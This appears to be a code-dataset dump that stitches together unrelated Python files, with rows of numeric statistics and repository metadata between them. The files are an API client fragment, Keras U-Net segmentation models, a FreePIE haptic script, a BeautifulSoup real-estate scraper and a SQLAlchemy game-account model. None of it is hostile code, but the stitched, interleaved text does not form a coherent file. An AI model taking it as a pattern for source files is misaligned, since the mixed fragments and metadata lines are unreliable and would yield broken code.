if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['application/json'])
# Authentication setting
auth_settings = ['api_key']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='Respondent',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'))
| 41.958076 | 132 | 0.582491 | 3,526 | 34,028 | 5.409813 | 0.061826 | 0.079895 | 0.054207 | 0.026422 | 0.935203 | 0.929541 | 0.923408 | 0.916855 | 0.911088 | 0.90291 | 0 | 0.000486 | 0.334813 | 34,028 | 810 | 133 | 42.009877 | 0.84038 | 0.350829 | 0 | 0.778667 | 1 | 0 | 0.175023 | 0.053588 | 0 | 0 | 0 | 0 | 0 | 1 | 0.04 | false | 0 | 0.018667 | 0 | 0.117333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
1af943e305d8a425da297353336883836376ed57 | 13,856 | py | Python | model.py | BenMaxGCU/Honours | 5a9314d843c090891ab20151663f07cbc766f28e | [
"MIT"
] | null | null | null | model.py | BenMaxGCU/Honours | 5a9314d843c090891ab20151663f07cbc766f28e | [
"MIT"
] | null | null | null | model.py | BenMaxGCU/Honours | 5a9314d843c090891ab20151663f07cbc766f28e | [
"MIT"
] | null | null | null | import numpy as np
import os
import skimage.io as io
import skimage.transform as trans
import numpy as np
from keras import backend as keras
from keras.models import *
from keras.layers import *
from keras.optimizers import *
from keras.callbacks import ModelCheckpoint, LearningRateScheduler
from custom_activations import swish
def unet(pretrained_weights = None,input_size = (320,480,1)):
inputs = Input(input_size)
conv1 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(inputs)
conv1 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv1)
pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)
conv2 = Conv2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool1)
conv2 = Conv2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv2)
pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)
conv3 = Conv2D(256, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool2)
conv3 = Conv2D(256, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv3)
pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)
conv4 = Conv2D(512, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool3)
conv4 = Conv2D(512, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv4)
drop4 = Dropout(0.5)(conv4)
pool4 = MaxPooling2D(pool_size=(2, 2))(drop4)
conv5 = Conv2D(1024, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(pool4)
conv5 = Conv2D(1024, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv5)
drop5 = Dropout(0.5)(conv5)
up6 = Conv2D(512, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(drop5))
merge6 = concatenate([drop4,up6], axis = 3)
conv6 = Conv2D(512, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge6)
conv6 = Conv2D(512, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv6)
up7 = Conv2D(256, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv6))
merge7 = concatenate([conv3,up7], axis = 3)
conv7 = Conv2D(256, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge7)
conv7 = Conv2D(256, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv7)
up8 = Conv2D(128, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv7))
merge8 = concatenate([conv2,up8], axis = 3)
conv8 = Conv2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge8)
conv8 = Conv2D(128, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv8)
up9 = Conv2D(64, 2, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(UpSampling2D(size = (2,2))(conv8))
merge9 = concatenate([conv1,up9], axis = 3)
conv9 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(merge9)
conv9 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv9)
conv9 = Conv2D(2, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv9)
conv10 = Conv2D(1, 1, activation = 'sigmoid')(conv9)
model = Model(input = inputs, output = conv10)
model.compile(optimizer = Adam(lr = 1e-4), loss = 'binary_crossentropy', metrics = ['accuracy'])
#model.summary()
if(pretrained_weights):
model.load_weights(pretrained_weights)
return model
# Convolutional neural network created based upon the U-Net architecture
def unet_cracks(pretrained_weights = None,input_size = (320,480,1)):
inputs = Input(input_size)
conv1 = Conv2D(64,3, activation='relu', padding='same', kernel_initializer='he_normal')(inputs)
conv1 = Conv2D(64,3, activation='relu', padding='same', kernel_initializer='he_normal')(conv1)
pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)
conv2 = Conv2D(128,3, activation='relu', padding='same', kernel_initializer='he_normal')(pool1)
conv2 = Conv2D(128,3, activation='relu', padding='same', kernel_initializer='he_normal')(conv2)
pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)
conv3 = Conv2D(256,3, activation='relu', padding='same', kernel_initializer='he_normal')(pool2)
conv3 = Conv2D(256,3, activation='relu', padding='same', kernel_initializer='he_normal')(conv3)
pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)
conv4 = Conv2D(512,3, activation='relu', padding='same', kernel_initializer='he_normal')(pool3)
conv4 = Conv2D(512,3, activation='relu', padding='same', kernel_initializer='he_normal')(conv4)
drop4 = Dropout(0.3)(conv4)
pool4 = MaxPooling2D(pool_size=(2, 2))(drop4)
up7 = Conv2D(256, 2, activation='relu', padding='same', kernel_initializer='he_normal')(UpSampling2D(size = (2,2))(pool4))
merge7 = Concatenate(axis=3)([conv3,up7])
conv7 = Conv2D(256,3, activation='relu', padding='same', kernel_initializer='he_normal')(merge7)
conv7 = Conv2D(256,3, activation='relu', padding='same', kernel_initializer='he_normal')(conv7)
up8 = Conv2D(128, 2, activation='relu', padding='same', kernel_initializer='he_normal')(UpSampling2D(size = (2,2))(conv7))
merge8 = Concatenate(axis=3)([conv2,up8])
conv8 = Conv2D(128,3, activation='relu', padding='same', kernel_initializer='he_normal')(merge8)
conv8 = Conv2D(128,3, activation='relu', padding='same', kernel_initializer='he_normal')(conv8)
up9 = Conv2D(64, 2, activation='relu', padding='same', kernel_initializer='he_normal')(UpSampling2D(size = (2,2))(conv8))
merge9 = Concatenate(axis=3)([conv1,up9])
conv9 = Conv2D(64,3, activation='relu', padding='same', kernel_initializer='he_normal')(merge9)
conv9 = Conv2D(64,3, activation='relu', padding='same', kernel_initializer='he_normal')(conv9)
conv9 = Conv2D(2,3, activation='relu', padding='same', kernel_initializer='he_normal')(conv9)
conv10 = Conv2D(1,1, activation='sigmoid')(conv9) # Returns the prediction as either 1 or 0
model = Model(input = inputs, output = conv10)
model.compile(optimizer = Adam(lr = 1e-4), loss = 'binary_crossentropy', metrics = ['accuracy'])
#model.summary()
if(pretrained_weights):
model.load_weights(pretrained_weights)
return model
# Smaller network still based off of U-Net architecture
def simple_unet(pretrained_weights = None,input_size = (320,480,1)):
inputs = Input(input_size)
conv1 = Conv2D(64,3, activation='swish', padding='same', kernel_initializer='he_normal')(inputs)
conv1 = Conv2D(64,3, activation='swish', padding='same', kernel_initializer='he_normal')(conv1)
pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)
conv2 = Conv2D(128,3, activation='swish', padding='same', kernel_initializer='he_normal')(pool1)
conv2 = Conv2D(128,3, activation='swish', padding='same', kernel_initializer='he_normal')(conv2)
pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)
conv3 = Conv2D(256,3, activation='swish', padding='same', kernel_initializer='he_normal')(pool2)
conv3 = Conv2D(256,3, activation='swish', padding='same', kernel_initializer='he_normal')(conv3)
pool3 = MaxPooling2D(pool_size=(2, 2))(conv3)
conv4 = Conv2D(512,3, activation='swish', padding='same', kernel_initializer='he_normal')(pool3)
conv4 = Conv2D(512,3, activation='swish', padding='same', kernel_initializer='he_normal')(conv4)
drop4 = Dropout(0.5)(conv4)
up5 = Conv2D(256, 2, activation='swish', padding='same', kernel_initializer='he_normal')(UpSampling2D(size = (2,2))(drop4))
trans5 = Conv2DTranspose(256, (2,2), strides=1, padding='same', activation='relu', kernel_initializer='he_normal')(up5)
merge5 = Concatenate(axis=3)([conv3,trans5])
conv5 = Conv2D(256,3, activation='swish', padding='same', kernel_initializer='he_normal')(merge5)
conv5 = Conv2D(256,3, activation='swish', padding='same', kernel_initializer='he_normal')(conv5)
up6 = Conv2D(128, 2, activation='swish', padding='same', kernel_initializer='he_normal')(UpSampling2D(size = (2,2))(conv5))
trans6 = Conv2DTranspose(128, (2,2), strides=1, padding='same', activation='relu', kernel_initializer='he_normal')(up6)
merge6 = Concatenate(axis=3)([conv2,trans6])
conv6 = Conv2D(128,3, activation='swish', padding='same', kernel_initializer='he_normal')(merge6)
conv6 = Conv2D(128,3, activation='swish', padding='same', kernel_initializer='he_normal')(conv6)
up7 = Conv2D(64, 2, activation='swish', padding='same', kernel_initializer='he_normal')(UpSampling2D(size = (2,2))(conv6))
trans7 = Conv2DTranspose(64, (2,2), strides=1, padding='same', activation='relu', kernel_initializer='he_normal')(up7)
merge7 = Concatenate(axis=3)([conv1,trans7])
conv7 = Conv2D(64,3, activation='swish', padding='same', kernel_initializer='he_normal')(merge7)
conv7 = Conv2D(64,3, activation='swish', padding='same', kernel_initializer='he_normal')(conv7)
conv7 = Conv2D(2,3, activation='swish', padding='same', kernel_initializer='he_normal')(conv7)
conv8 = Conv2D(1,1, activation='sigmoid')(conv7) # Returns the prediction as either 1 or 0
model = Model(input = inputs, output = conv8)
model.compile(optimizer = Adam(lr = 1e-4), loss = 'binary_crossentropy', metrics = ['accuracy'])
#model.summary()
if(pretrained_weights):
model.load_weights(pretrained_weights)
return model
def crf_unet(pretrained_weights = None,input_size = (320,480,1)):
inputs = Input(input_size)
conv1 = Conv2D(32,3, activation='swish', padding='same', kernel_initializer='he_normal')(inputs)
drop1 = Dropout(0.2)(conv1)
conv1 = Conv2D(32,3, activation='swish', padding='same', kernel_initializer='he_normal')(drop1)
pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)
conv2 = Conv2D(64,3, activation='swish', padding='same', kernel_initializer='he_normal')(pool1)
drop2 = Dropout(0.2)(conv2)
conv2 = Conv2D(64,3, activation='swish', padding='same', kernel_initializer='he_normal')(drop2)
pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)
conv3 = Conv2D(128,3, activation='swish', padding='same', kernel_initializer='he_normal')(pool2)
drop3 = Dropout(0.2)(conv3)
conv3 = Conv2D(128,3, activation='swish', padding='same', kernel_initializer='he_normal')(drop3)
up3 = UpSampling2D(size=(2, 2))(conv3)
up3 = Concatenate(axis=3)([conv2,up3])
conv4 = Conv2D(64,3, activation='swish', padding='same', kernel_initializer='he_normal')(up3)
drop4 = Dropout(0.2)(conv4)
conv4 = Conv2D(64,3, activation='swish', padding='same', kernel_initializer='he_normal')(drop4)
up5 = UpSampling2D(size = (2,2))(conv4)
up5 = Concatenate(axis=3)([conv1,up5])
conv5 = Conv2D(32,3, activation='swish', padding='same', kernel_initializer='he_normal')(up5)
drop5 = Dropout(0.2)(conv5)
conv5 = Conv2D(32,3, activation='swish', padding='same', kernel_initializer='he_normal')(drop5)
conv6 = Conv2D(2, 1, activation='swish', padding='same', kernel_initializer='he_normal')(conv5)
conv7 = Conv2D(1,1, activation='sigmoid')(conv6)
model = Model(input = inputs, output = conv7)
model.compile(optimizer = Adam(lr = 1e-4), loss = 'binary_crossentropy', metrics = ['accuracy'])
#model.summary()
if(pretrained_weights):
model.load_weights(pretrained_weights)
return model
# Smaller network still based off of U-Net architecture using LeakyReLu
def lrcrf_unet(pretrained_weights = None,input_size = (250,250,1)):
inputs = Input(input_size)
leaky_relu = LeakyReLU(alpha=0.2)
conv1 = Conv2D(32,3, padding='same', kernel_initializer='he_normal')(inputs)
conv1 = leaky_relu(conv1)
drop1 = Dropout(0.2)(conv1)
conv1 = Conv2D(32,3, padding='same', kernel_initializer='he_normal')(drop1)
conv1 = leaky_relu(conv1)
pool1 = MaxPooling2D(pool_size=(2, 2))(conv1)
conv2 = Conv2D(64,3, padding='same', kernel_initializer='he_normal')(pool1)
conv2 = leaky_relu(conv2)
drop2 = Dropout(0.2)(conv2)
conv2 = Conv2D(64,3, padding='same', kernel_initializer='he_normal')(drop2)
conv2 = leaky_relu(conv2)
pool2 = MaxPooling2D(pool_size=(2, 2))(conv2)
conv3 = Conv2D(128,3, padding='same', kernel_initializer='he_normal')(pool2)
conv3 = leaky_relu(conv3)
drop3 = Dropout(0.2)(conv3)
conv3 = Conv2D(128,3, padding='same', kernel_initializer='he_normal')(drop3)
conv3 = leaky_relu(conv3)
up3 = UpSampling2D(size=(2, 2))(conv3)
up3 = Concatenate(axis=3)([conv2,up3])
conv4 = Conv2D(64,3, padding='same', kernel_initializer='he_normal')(up3)
conv4 = leaky_relu(conv4)
drop4 = Dropout(0.2)(conv4)
conv4 = Conv2D(64,3, padding='same', kernel_initializer='he_normal')(drop4)
conv4 = leaky_relu(conv4)
up5 = UpSampling2D(size = (2,2))(conv4)
up5 = Concatenate(axis=3)([conv1,up5])
conv5 = Conv2D(32,3, padding='same', kernel_initializer='he_normal')(up5)
conv5 = leaky_relu(conv5)
drop5 = Dropout(0.2)(conv5)
conv5 = Conv2D(32,3, padding='same', kernel_initializer='he_normal')(drop5)
conv5 = leaky_relu(conv5)
conv6 = Conv2D(2, 1, padding='same', kernel_initializer='he_normal')(conv5)
conv6 = leaky_relu(conv6)
conv7 = Conv2D(1,1, activation='sigmoid')(conv6)
model = Model(input = inputs, output = conv7)
model.compile(optimizer = Adam(lr = 1e-4), loss = 'binary_crossentropy', metrics = ['accuracy'])
#model.summary()
if(pretrained_weights):
model.load_weights(pretrained_weights)
return model | 50.569343 | 132 | 0.690026 | 1,806 | 13,856 | 5.163898 | 0.075858 | 0.099078 | 0.171134 | 0.225177 | 0.886018 | 0.880763 | 0.877118 | 0.865537 | 0.854815 | 0.823933 | 0 | 0.07541 | 0.145352 | 13,856 | 274 | 133 | 50.569343 | 0.712126 | 0.02526 | 0 | 0.587629 | 0 | 0 | 0.117285 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.025773 | false | 0 | 0.056701 | 0 | 0.108247 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2105c3135b74b036ddfff8fbe6b797c9dfa145a0 | 398 | py | Python | FreePIEScript_HapticFeedbackSample.py | ahinore/NoloFreePIEPlugin | e587fdc20067e9c6d04ad7851827b5e87cf82dde | [
"MIT"
] | 1,946 | 2018-05-25T11:29:44.000Z | 2022-03-24T09:15:54.000Z | FreePIEScript_HapticFeedbackSample.py | ahinore/NoloFreePIEPlugin | e587fdc20067e9c6d04ad7851827b5e87cf82dde | [
"MIT"
] | 708 | 2018-05-27T09:56:07.000Z | 2021-11-08T11:26:30.000Z | FreePIEScript_HapticFeedbackSample.py | ahinore/NoloFreePIEPlugin | e587fdc20067e9c6d04ad7851827b5e87cf82dde | [
"MIT"
] | 382 | 2018-05-25T20:13:24.000Z | 2022-03-29T18:33:12.000Z |
diagnostics.watch(alvr.input_haptic_feedback[0][0]) #fAmplitude
diagnostics.watch(alvr.input_haptic_feedback[0][1]) #fDurationSeconds
diagnostics.watch(alvr.input_haptic_feedback[0][2]) #fFrequency
diagnostics.watch(alvr.input_haptic_feedback[1][0]) #fAmplitude
diagnostics.watch(alvr.input_haptic_feedback[1][1]) #fDurationSeconds
diagnostics.watch(alvr.input_haptic_feedback[1][2]) #fFrequency
| 44.222222 | 69 | 0.829146 | 54 | 398 | 5.888889 | 0.222222 | 0.301887 | 0.377358 | 0.471698 | 0.930818 | 0.930818 | 0.930818 | 0.666667 | 0 | 0 | 0 | 0.03125 | 0.035176 | 398 | 8 | 70 | 49.75 | 0.796875 | 0.180905 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
2113bf3861e3a27ad3188c3513d1b29be47a27b5 | 5,015 | py | Python | cent21.py | shadowp2810/python_WebScraper_cent21RealEstate | 186e663fbf8a333433b1d64731431c91aa59589c | [
"MIT"
] | null | null | null | cent21.py | shadowp2810/python_WebScraper_cent21RealEstate | 186e663fbf8a333433b1d64731431c91aa59589c | [
"MIT"
] | null | null | null | cent21.py | shadowp2810/python_WebScraper_cent21RealEstate | 186e663fbf8a333433b1d64731431c91aa59589c | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding: utf-8
# In[121]:
import requests
from bs4 import BeautifulSoup
r = requests.get(
"http://www.pyclass.com/real-estate/rock-springs-wy/LCWYROCKSPRINGS/" ,
headers = {
'User-agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0' } )
c = r.content
soup = BeautifulSoup( c , "html.parser" )
# print( soup.prettify() )
all = soup.find_all(
"div" ,
{ "class" : "propertyRow" } )
# all # len( all ) # all[ 0 ]
all[ 0 ].find(
"h4" ,
{ "class" : "propPrice" } ).text.replace(
"\n" , "" ).replace( " " , "" )
# In[122]:
l = [] #list to store dictionaries of items
for item in all:
d = {} #dictionary to store all items
d[ "Price" ] = item.find( "h4" ,
{ "class" , "propPrice" } ).text.replace(
"\n" , "" ).replace( " " , "" )
d[ "Address" ] = item.find_all( "span" ,
{ "class" , "propAddressCollapse" } )[0].text
d[ "Locality" ] = item.find_all( "span" ,
{ "class" , "propAddressCollapse" } )[1].text
try:
d[ "Beds" ] = item.find( "span" ,
{ "class" , "infoBed"} ).find( "b" ).text
except:
d[ "Beds" ] = None
try:
d[ "Area" ] = item.find( "span" ,
{ "class" : "infoSqFt"} ).find( "b" ).text
except:
d[ "Area" ] = None
try:
d[ "Full Bath" ] = item.find( "span" ,
{ "class" : "infoValueFullBath"} ).find( "b" ).text
except:
d[ "Full Bath" ] = None
try:
d[ "Half Bath" ] = item.find( "span" ,
{ "class" : "infoValueHalfBath"} ).find( "b" ).text
except:
d[ "Half Bath" ] = None
for column_group in item.find_all(
"div" , { "class" , "columnGroup" } ) :
# print( column_group )
for feature_group , feature_name in zip(
column_group.find_all( "span" ,
{ "class" , "featureGroup" } ) ,
column_group.find_all( "span" ,
{ "class" , "featureName" } ) ) :
if "Lot Size" in feature_group.text :
d[ "Lot Size" ] = feature_name.text
l.append( d )
l
# In[123]:
import pandas
df = pandas.DataFrame( l )
df
# In[124]:
df.to_csv( "Output.csv" )
# In[130]:
l_allPages = [] #list to store dictionaries of items
final_page_nbr = soup.find_all(
"a" ,
{ "class" : "Page" } )[-1].text
base_url = "http://www.pyclass.com/real-estate/rock-springs-wy/LCWYROCKSPRINGS/t=0&s="
for page in range( 0 , int( final_page_nbr ) * 10 , 10 ) :
print( base_url + str( page ) + ".html" )
r = requests.get(
( base_url + str( page ) + ".html" ) ,
headers = {
'User-agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0' } )
c = r.content
soup = BeautifulSoup( c , "html.parser" )
# print( soup.prettify() )
all = soup.find_all(
"div" ,
{ "class" : "propertyRow" } )
for item in all:
d = {} #dictionary to store all items
d[ "Price" ] = item.find( "h4" ,
{ "class" , "propPrice" } ).text.replace(
"\n" , "" ).replace( " " , "" )
d[ "Address" ] = item.find_all( "span" ,
{ "class" , "propAddressCollapse" } )[0].text
try:
d[ "Locality" ] = item.find_all( "span" ,
{ "class" , "propAddressCollapse" } )[1].text
except:
d[ "Locality" ] = None
try:
d[ "Beds" ] = item.find( "span" ,
{ "class" , "infoBed"} ).find( "b" ).text
except:
d[ "Beds" ] = None
try:
d[ "Area" ] = item.find( "span" ,
{ "class" : "infoSqFt"} ).find( "b" ).text
except:
d[ "Area" ] = None
try:
d[ "Full Bath" ] = item.find( "span" ,
{ "class" : "infoValueFullBath"} ).find( "b" ).text
except:
d[ "Full Bath" ] = None
try:
d[ "Half Bath" ] = item.find( "span" ,
{ "class" : "infoValueHalfBath"} ).find( "b" ).text
except:
d[ "Half Bath" ] = None
for column_group in item.find_all(
"div" , { "class" , "columnGroup" } ) :
# print( column_group )
for feature_group , feature_name in zip(
column_group.find_all( "span" ,
{ "class" , "featureGroup" } ) ,
column_group.find_all( "span" ,
{ "class" , "featureName" } ) ) :
if "Lot Size" in feature_group.text :
d[ "Lot Size" ] = feature_name.text
l_allPages.append( d )
l_allPages
# In[131]:
import pandas
df = pandas.DataFrame( l_allPages )
df
# In[132]:
df.to_csv( "Output_allPages.csv" )
| 24.950249 | 109 | 0.470588 | 540 | 5,015 | 4.287037 | 0.233333 | 0.055292 | 0.042765 | 0.055292 | 0.851404 | 0.835853 | 0.784017 | 0.784017 | 0.767171 | 0.767171 | 0 | 0.025994 | 0.36331 | 5,015 | 200 | 110 | 25.075 | 0.699029 | 0.069591 | 0 | 0.804878 | 0 | 0.02439 | 0.230786 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.03252 | 0 | 0.03252 | 0.00813 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
2126f74663032c5a5941bab4aca0447914b4be98 | 6,964 | py | Python | dash/data/penguin.py | klabacher/dash | e8eeee80e7deef07bcc139c212947c916543898f | [
"MIT"
] | null | null | null | dash/data/penguin.py | klabacher/dash | e8eeee80e7deef07bcc139c212947c916543898f | [
"MIT"
] | null | null | null | dash/data/penguin.py | klabacher/dash | e8eeee80e7deef07bcc139c212947c916543898f | [
"MIT"
] | null | null | null | from dash.data import db
class Penguin(db.Model):
__tablename__ = 'penguin'
id = db.Column(db.Integer, primary_key=True, server_default=db.text("nextval('\"penguin_id_seq\"'::regclass)"))
username = db.Column(db.String(12), nullable=False, unique=True)
nickname = db.Column(db.String(30), nullable=False)
password = db.Column(db.CHAR(60), nullable=False)
email = db.Column(db.String(255), nullable=False, index=True)
registration_date = db.Column(db.DateTime, nullable=False, server_default=db.text("now()"))
active = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
safe_chat = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
last_paycheck = db.Column(db.DateTime, nullable=False, server_default=db.text("now()"))
minutes_played = db.Column(db.Integer, nullable=False, server_default=db.text("0"))
moderator = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
stealth_moderator = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
character = db.Column(db.ForeignKey('character.id', ondelete='CASCADE', onupdate='CASCADE'))
igloo = db.Column(db.ForeignKey('penguin_igloo_room.id', ondelete='CASCADE', onupdate='CASCADE'))
coins = db.Column(db.Integer, nullable=False, server_default=db.text("500"))
color = db.Column(db.ForeignKey('item.id', ondelete='CASCADE', onupdate='CASCADE'))
head = db.Column(db.ForeignKey('item.id', ondelete='CASCADE', onupdate='CASCADE'))
face = db.Column(db.ForeignKey('item.id', ondelete='CASCADE', onupdate='CASCADE'))
neck = db.Column(db.ForeignKey('item.id', ondelete='CASCADE', onupdate='CASCADE'))
body = db.Column(db.ForeignKey('item.id', ondelete='CASCADE', onupdate='CASCADE'))
hand = db.Column(db.ForeignKey('item.id', ondelete='CASCADE', onupdate='CASCADE'))
feet = db.Column(db.ForeignKey('item.id', ondelete='CASCADE', onupdate='CASCADE'))
photo = db.Column(db.ForeignKey('item.id', ondelete='CASCADE', onupdate='CASCADE'))
flag = db.Column(db.ForeignKey('item.id', ondelete='CASCADE', onupdate='CASCADE'))
permaban = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
book_modified = db.Column(db.SmallInteger, nullable=False, server_default=db.text("0"))
book_color = db.Column(db.SmallInteger, nullable=False, server_default=db.text("1"))
book_highlight = db.Column(db.SmallInteger, nullable=False, server_default=db.text("1"))
book_pattern = db.Column(db.SmallInteger, nullable=False, server_default=db.text("0"))
book_icon = db.Column(db.SmallInteger, nullable=False, server_default=db.text("1"))
agent_status = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
field_op_status = db.Column(db.SmallInteger, nullable=False, server_default=db.text("0"))
career_medals = db.Column(db.Integer, nullable=False, server_default=db.text("0"))
agent_medals = db.Column(db.Integer, nullable=False, server_default=db.text("0"))
last_field_op = db.Column(db.DateTime, nullable=False, server_default=db.text("now()"))
com_message_read_date = db.Column(db.DateTime, nullable=False, server_default=db.text("now()"))
ninja_rank = db.Column(db.SmallInteger, nullable=False, server_default=db.text("0"))
ninja_progress = db.Column(db.SmallInteger, nullable=False, server_default=db.text("0"))
fire_ninja_rank = db.Column(db.SmallInteger, nullable=False, server_default=db.text("0"))
fire_ninja_progress = db.Column(db.SmallInteger, nullable=False, server_default=db.text("0"))
water_ninja_rank = db.Column(db.SmallInteger, nullable=False, server_default=db.text("0"))
water_ninja_progress = db.Column(db.SmallInteger, nullable=False, server_default=db.text("0"))
ninja_matches_won = db.Column(db.Integer, nullable=False, server_default=db.text("0"))
fire_matches_won = db.Column(db.Integer, nullable=False, server_default=db.text("0"))
water_matches_won = db.Column(db.Integer, nullable=False, server_default=db.text("0"))
rainbow_adoptability = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
has_dug = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
puffle_handler = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
nuggets = db.Column(db.SmallInteger, nullable=False, server_default=db.text("0"))
walking = db.Column(db.ForeignKey('penguin_puffle.id', ondelete='CASCADE', onupdate='CASCADE'))
opened_playercard = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
special_wave = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
special_dance = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
special_snowball = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
map_category = db.Column(db.SmallInteger, nullable=False, server_default=db.text("0"))
status_field = db.Column(db.Integer, nullable=False, server_default=db.text("0"))
timer_active = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
timer_start = db.Column(db.Time, nullable=False, server_default=db.text("'00:00:00'::time without time zone"))
timer_end = db.Column(db.Time, nullable=False, server_default=db.text("'23:59:59'::time without time zone"))
timer_total = db.Column(db.Interval, nullable=False, server_default=db.text("'01:00:00'::interval"))
grounded = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
approval_en = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
approval_pt = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
approval_fr = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
approval_es = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
approval_de = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
approval_ru = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
rejection_en = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
rejection_pt = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
rejection_fr = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
rejection_es = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
rejection_de = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
rejection_ru = db.Column(db.Boolean, nullable=False, server_default=db.text("false"))
class ActivationKey(db.Model):
__tablename__ = 'activation_key'
penguin_id = db.Column(db.ForeignKey('penguin.id', ondelete='CASCADE', onupdate='CASCADE'), primary_key=True,
nullable=False)
activation_key = db.Column(db.CHAR(255), primary_key=True, nullable=False)
